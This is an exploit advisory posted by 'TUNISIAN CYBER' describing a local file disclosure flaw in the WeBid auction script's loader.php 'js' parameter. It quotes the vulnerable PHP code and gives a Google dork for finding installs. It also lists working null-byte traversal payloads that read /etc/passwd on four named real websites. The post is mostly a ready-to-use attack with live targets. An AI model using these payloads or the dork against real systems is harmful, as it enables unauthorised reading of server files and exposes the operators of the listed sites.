facebook facebook twitter rss

WeBid (all versions) LFD vulnerability

Author: TUNISIAN CYBER , Published: 31-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: WeBid (all versions) LFD vulnerability
[+] Date: 31-12-2013
[+] Category: WebApp
[+] Google Dork: :"Powered by WeBid ©"
[+] Tested on: KaliLinux
[+] Vendor: http://sourceforge.net/projects/simpleauction/files/latest/download?source=directory
[+} Friend's blog: www.na3il.com

########################################################################################
+Description:
Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.

+Exploit:
Acal Suffers from an LFD vulnerability:

File(s): Loader.php
Parameter:js

Source Code: Lines 15-->40
[PHP]
ob_start('ob_gzhandler');
header("Content-type: text/javascript");
include 'inc/checks/files.php';
if (isset($_GET['js']))
{
$js = explode(';', $_GET['js']);
foreach ($js as $val)
{
$ext = substr($val, strrpos($val, '.') + 1);
if ($ext == 'php')
{
if (check_file($val))
{
include $val;
}
}
elseif ($ext == 'js' || $ext == 'css')
{
if (check_file($val) && is_file($val))
{
echo file_get_contents($val);
echo "\n";
}
}
}
}
[PHP]
127.0.0.1/PATH/WEBID/loader.php?js=LFD

Demo:
http://www.dc.k12.mn.us/WeBid/loader.php?js=/etc/passwd%00.css
http://www.bidrush.com/loader.php?js=/etc/passwd%00.css
https://web.wlu.ca/emptybowls/loader.php?js=/etc/passwd%00.css
http://jmrdragracing.com/WeBid/loader.php?js=/etc/passwd%00.css

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :